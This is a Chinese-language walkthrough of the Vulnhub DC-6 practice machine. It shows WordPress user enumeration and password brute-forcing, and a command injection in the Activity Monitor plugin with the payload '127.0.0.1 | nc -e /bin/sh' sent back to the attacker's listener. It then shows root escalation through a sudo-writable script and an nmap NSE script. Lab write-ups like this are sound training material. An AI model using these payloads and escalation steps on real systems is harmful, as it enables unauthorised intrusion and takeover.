天天看點
傳回

Vulnhub靶場----6、DC-6一、環境搭建二、滲透流程三、思路總結

文章目錄

  • 一、環境搭建
  • 二、滲透流程
  • 三、思路總結

一、環境搭建

DC-6下載下傳位址:https://download.vulnhub.com/dc/DC-6.zip

kali:192.168.144.148

DC-6:192.168.144.154

靶機描述:

 選擇

帶k01的密碼

 後面會用到
Vulnhub靶場----6、DC-6一、環境搭建二、滲透流程三、思路總結
通路192.168.144.154,位址欄上方的ip變成了域名http://wordy,添加host檔案
Vulnhub靶場----6、DC-6一、環境搭建二、滲透流程三、思路總結

二、滲透流程 

nmap -A -T5 -sV -sT -p- 192.168.144.154
Vulnhub靶場----6、DC-6一、環境搭建二、滲透流程三、思路總結

思路:

 1、80端口

目錄掃描:dirb、gobuster、dirsearch等工具;

web站點資産識别:goby、whatweb等;

web站點功能頁面;

分析網頁源代碼;

……

2、22端口

ssh爆破、有賬号密碼資訊進行遠端登入

……

目錄掃描結果:
http://wordy/wp-login.php		#背景管理頁面
http://wordy/wp-includes/		#網站目錄
           
#指紋探測
whatweb  http://wordy
Vulnhub靶場----6、DC-6一、環境搭建二、滲透流程三、思路總結

思路:

 web站點是Wordpress CMS

1、Wordpress版本漏洞

2、Wordpress插件漏洞

3、背景位址,賬号密碼爆破

#枚舉網站使用者
wpscan --url http://wordy -e u
Vulnhub靶場----6、DC-6一、環境搭建二、滲透流程三、思路總結
#利用枚舉到的網站使用者名進行爆破
#篩選出有k01的密碼儲存到新的字典passwords.txt中
cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt
wpscan --url http://wordy  -U "admin","mark","jens","sarch","graham" -P passwords.txt
Vulnhub靶場----6、DC-6一、環境搭建二、滲透流程三、思路總結
#ssh登入失敗
ssh [email protected]
Vulnhub靶場----6、DC-6一、環境搭建二、滲透流程三、思路總結
登入背景管理頁面
使用者名:密碼     mark:helpdesk01
管理頁面位址:http://wordy/wp-login.php
Vulnhub靶場----6、DC-6一、環境搭建二、滲透流程三、思路總結
#Activity monitor元件
searchsploit activity monitor
#後兩個指令注入和遠端代碼執行都可以加以利用
Vulnhub靶場----6、DC-6一、環境搭建二、滲透流程三、思路總結
#檢視45274.html
指令1:cat /usr/share/exploitdb/exploits/php/webapps/45274.html
指令2:file:///usr/share/exploitdb/exploits/php/webapps/45274.html
#修改45274.html
cp /usr/share/exploitdb/exploits/php/webapps/45274.html  45274.html
vim 45274.html
#修改為如下内容
Vulnhub靶場----6、DC-6一、環境搭建二、滲透流程三、思路總結
#kali開啟監聽
nc -lnvp 4444
#浏覽器通路45274.html,點選submit,反彈shell未成功
Vulnhub靶場----6、DC-6一、環境搭建二、滲透流程三、思路總結
點選Lookup按鈕,抓包
Vulnhub靶場----6、DC-6一、環境搭建二、滲透流程三、思路總結
#burpsuite抓包
修改指令為127.0.0.1 | nc -e /bin/sh 192.168.144.148 4444
反彈shell成功
Vulnhub靶場----6、DC-6一、環境搭建二、滲透流程三、思路總結
Vulnhub靶場----6、DC-6一、環境搭建二、滲透流程三、思路總結
#利用python切換到bash環境
python -c 'import pty;pty.spawn("/bin/bash")'
Vulnhub靶場----6、DC-6一、環境搭建二、滲透流程三、思路總結
cat /home/mark/stuff/things-to-do.txt
#該檔案下存在賬号密碼:graham - GSo7isUM1D4
Vulnhub靶場----6、DC-6一、環境搭建二、滲透流程三、思路總結
#利用擷取的賬号密碼登入
ssh [email protected]
Vulnhub靶場----6、DC-6一、環境搭建二、滲透流程三、思路總結
sudo -l
cat /home/jens/backups.sh
#backups.sh檔案内容是對網站的打包指令,作用是備份網站根目錄。
Vulnhub靶場----6、DC-6一、環境搭建二、滲透流程三、思路總結
sudo -l
#jens使用者不需要密碼就可以執行backups.sh檔案
Vulnhub靶場----6、DC-6一、環境搭建二、滲透流程三、思路總結
echo "/bin/bash" >> backups.sh
sudo -u jens ./backups.sh
Vulnhub靶場----6、DC-6一、環境搭建二、滲透流程三、思路總結
sudo -l		#顯示目前使用者可以用sudo執行哪些指令
#在jens的shell下,可以在不需要密碼的情況下,以root的身份權限執行nmap
#利用nmap的--script參數執行反彈shell腳本
echo 'os.execute("/bin/sh")' > getShell.nse
sudo nmap --script=./getshell.nse
Vulnhub靶場----6、DC-6一、環境搭建二、滲透流程三、思路總結

這裡有個問題:擷取到root權限之後,頁面輸入的指令看不見,但是可以執行。
Vulnhub靶場----6、DC-6一、環境搭建二、滲透流程三、思路總結

三、思路總結 

1、資訊收集
2、暴力破解登入Wordpress背景
3、利用Wordpress CMS元件漏洞反彈shell
4、ssh遠端登入後尋找可以執行sudo指令的操作
5、寫入nmap反彈shell腳本
靶場集合 # Vulnhub vulnhub DC-6
上一篇: C調用C++(C++封裝以及C對其調用)
下一篇: Vulnhub靶場----7、DC-7一、環境搭建二、滲透流程三、思路總結

繼續閱讀